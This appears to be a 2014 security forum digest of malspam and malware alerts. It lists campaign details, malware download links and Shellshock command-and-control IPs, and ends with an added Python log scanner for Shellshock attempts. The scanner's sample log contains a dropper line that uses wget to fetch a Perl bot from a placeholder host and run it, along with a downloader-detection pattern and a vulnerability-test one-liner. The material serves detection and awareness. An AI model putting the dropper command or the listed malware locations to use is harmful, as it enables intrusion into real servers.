The attached ZIP file name is in the format like Copy4167506/9332.zip and contains the 89 kB large file Invoice_815992488951.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/e...is/1412243475/
The 2nd campaign has the following details: This email is sent from the spoofed addresses like “Harrison Andrews , Billing Dept” <049aaa@***** .pl> and has the following body:
This email contains an invoice ID:P198150_874 file attachment.
Yours faithfully,
Harrison Andrews , Department CCD
The attached ZIP file name is in the format like P198150_874.zip and contains the 89 kB large file Invoice_33618247236242544.xls.scr. The trojan is known as HEUR/QVM20.1.Malware.Gen. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/3...cefa/analysis/
Fake Adobe, Personal reply, Transactions Report, Dropbox malSPAM
FYI...
Fake 'Transactions Report' SPAM - fake PDF malware
- http://myonlinesecurity.co.uk/alert-...e-pdf-malware/
3 Oct 2014 - "'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' pretending to come from Tech Server is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very terse and basic with a simple one line content:
Your requested report is attached here...
3 October 2014: transact_store.zip: Extracts to: transact_e5ebfdsd621.exe
Current Virus total detections: 2/54* . This is the same malware that is being dropped by today’s version of http://myonlinesecurity.co.uk/new-photo-malware/
This 'Alert Transactions Report by users from 2014-09-28 to 2014-09-28' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e...is/1412331282/
___
Fake 'shopping' malSPAM spreads via Dropbox
- http://blog.dynamoo.com/2014/10/than...-us-today.html
3 Oct 2014 - "This spam email leads to malware hosted on Dropbox:
From: pghaa@ pghaa .org
To: victim@ victimdomain .com
Date: 3 October 2014 11:43
Subject: victim@ victimdomain .com
Thanks for shopping with us today! Your purchase will be processed shortly.
ORDER DETAILS
Purchase Number: CTV188614791
Purchase Date: 7:38 2-Oct-2014
Customer Email: victim@ victimdomain .com
Amount: 4580 US Dollars
Open your payment details
Please click the link provided above to get more details about your order...
In this case the download location is https ://www .dropbox .com/s/7n4ib0ysqnzr4un/Payment%20Details_52375.zip?dl=1 although it is likely that there are others. The download file is Payment Details_52375.zip containing a malicious executable PAYMENT DETAILS.PDF .scr_56453.exe which has a VirusTotal detection rate of 5/55*. At the moment, automated analysis tools are inconclusive as to what it does.
UPDATE: it is also being distributed via
[donotclick]
https ://www .dropbox .com/s/9an3ggp98xu7ql5/Transaction_85523.zip?dl=1
https ://www .dropbox .com/s/8uoheamseo98nse/Information_J90Z4.zip?dl=1"
* https://www.virustotal.com/en-gb/fil...is/1412334793/
___
Fake 'Personal reply' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/re-per...d-doc-malware/
3 Oct 2014 - "'Re: Personal reply id 509359' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con...fice_macro.png
3 October 2014: Reply02.doc . Current Virus total detections: 4/55*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/7...is/1412314059/
___
Fake 'Adobe invoice' SPAM...
- http://blog.mxlab.eu/2014/10/02/mali...rvice-invoice/
Oct 2, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Adobe Invoice”. This email is sent from the spoofed address “Adobe Billing <billing@ adobe .com>” and has the following body:
Dear Customer,
Thank you for signing up for Adobe Creative Cloud Service.
Attached is your copy of the invoice.
Thank you for your purchase.
Thank you,
The Adobe Team
Adobe Creative Cloud Service
Screenshot: http://img.blog.mxlab.eu/2014/20141002_adobe.gif
The attached file is 42 kB in size and is named Adobe Invoice.doc. The trojan is known as W97M.Dropper.F, VBA/TrojanDownloader.Agent.AZ, MSOffice/Agent!tr or Win32.Trojan.Macro.Dxmz. At the time of writing, 4 of the 55 AV engines detected the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/5...f3f5/analysis/
___
Shellshock in-the-wild - drops malware
- http://community.websense.com/blogs/...erability.aspx
1 Oct 2014 - "Since the Shellshock vulnerability became public knowledge... vulnerability being exploited in the wild to drop malware...
Backdoors and Bot Nets: The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers... The malware has the following capabilities:
- A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.
- A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen -4- variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure: The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
208.118.61.44: https://www.virustotal.com/en/ip-add...4/information/
27.19.159.224: https://www.virustotal.com/en/ip-add...4/information/
89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
212.227.251.139: https://www.virustotal.com/en/ip-add...9/information/
... We have seen C&C traffic to these IPs in the last 2 -months- showing that they have been used for malicious and bot network campaigns -prior- to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as 'vSkimmer'. More recently, we have observed it serving up an IRC bot... Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, -additional- vulnerabilities are likely to surface..."
- http://atlas.arbor.net/briefs/index#1914014714
Extreme Severity
3 Oct 2014
:fear::fear: :mad:
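The Websense write-up above describes the in-the-wild pattern without showing what it looks like in a log: a bash function prefix ("() { ...};") smuggled in through a CGI-exposed header, followed by curl or wget fetching the payload and running it. The following is an added example of detection logic for exactly that pattern, not Websense's code. It assumes the Apache/nginx "combined" access-log format, checks the request line, Referer and User-Agent fields (the ones CGI turns into environment variables), separates scanner probes from droppers by looking for a downloader in the trailing command, and pulls out the payload URLs for blocking. The sample lines and the example.invalid hostname are constructed, not real traffic.

```python
"""Flag Shellshock exploitation attempts in web server access logs.

Added example, not Websense's code. Assumes Apache/nginx "combined" log
format; the sample lines below are constructed, not real traffic.
"""
import re
from dataclasses import dataclass

# A Shellshock probe is a bash function definition followed by trailing
# commands: "() { <body> }; <commands>". CGI servers copy request headers
# into environment variables (HTTP_USER_AGENT, HTTP_REFERER, ...), which is
# why the payload turns up in those log fields. Everything after "};" is the
# attacker's command string.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)", re.S)
# Downloaders named in the report above; their presence points at a dropper.
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget|fetch|tftp)\b")
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"<>;|&]+")

# Combined log: ip ident user [ts] "request" status bytes "referer" "user-agent"
# Quoted fields may contain \" escapes, so accept any escaped character.
_FIELD = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    rf'"(?P<request>{_FIELD})" (?P<status>\d{{3}}) (?P<bytes>\S+) '
    rf'"(?P<referer>{_FIELD})" "(?P<ua>{_FIELD})"'
)
HEADER_NAMES = {"request": "request-line", "referer": "Referer", "ua": "User-Agent"}


@dataclass
class Hit:
    client_ip: str
    timestamp: str
    header: str            # which field carried the payload
    command: str           # attacker command string after "};"
    uses_downloader: bool  # curl/wget style fetch seen in the command
    urls: list             # payload URLs worth blocking / pivoting on


def shellshock_command(value: str):
    """Return the command string after a Shellshock function prefix, else None."""
    m = SHELLSHOCK_RE.search(value)
    return m.group("cmd").strip() if m else None


def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def scan_line(line: str):
    """Parse one combined-format line; return a Hit or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for key in ("request", "referer", "ua"):
        cmd = shellshock_command(_unescape(m.group(key)))
        if cmd is None:
            continue
        return Hit(
            client_ip=m.group("ip"),
            timestamp=m.group("ts"),
            header=HEADER_NAMES[key],
            command=cmd,
            uses_downloader=bool(DOWNLOADER_RE.search(cmd)),
            urls=URL_RE.findall(cmd),
        )
    return None


def scan_log(lines):
    return [h for h in map(scan_line, lines) if h is not None]


# Constructed sample (hostnames are placeholders, not real C&C):
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2014:10:00:00 +0000] "GET /index.html HTTP/1.1" '
    '200 1234 "-" "Mozilla/5.0"',
    # function prefix in User-Agent, then wget a Perl bot and run it
    '198.51.100.23 - - [01/Oct/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 0 "-" "() { :;}; /bin/bash -c \\"wget http://example.invalid/bot.pl '
    '-O /tmp/bot.pl; perl /tmp/bot.pl\\""',
    # scanner probe in Referer: no dropper, just a test for vulnerability
    '198.51.100.99 - - [01/Oct/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '500 0 "() { :; }; echo shellshock" "curl/7.30.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.client_ip} via {hit.header}: {hit.command!r} "
              f"downloader={hit.uses_downloader} urls={hit.urls}")
```

Run it over a real access log with `scan_log(open(path))`. A hit with uses_downloader set is the dropper case described above and the URLs are the first thing to block; a hit without one is usually a scanner checking whether the host is vulnerable, which is still worth noting because the same source tends to return with a payload. To check a host itself rather than its logs, the classic one-liner `env x='() { :;}; echo vulnerable' bash -c 'echo test'` prints "vulnerable" on an unpatched bash.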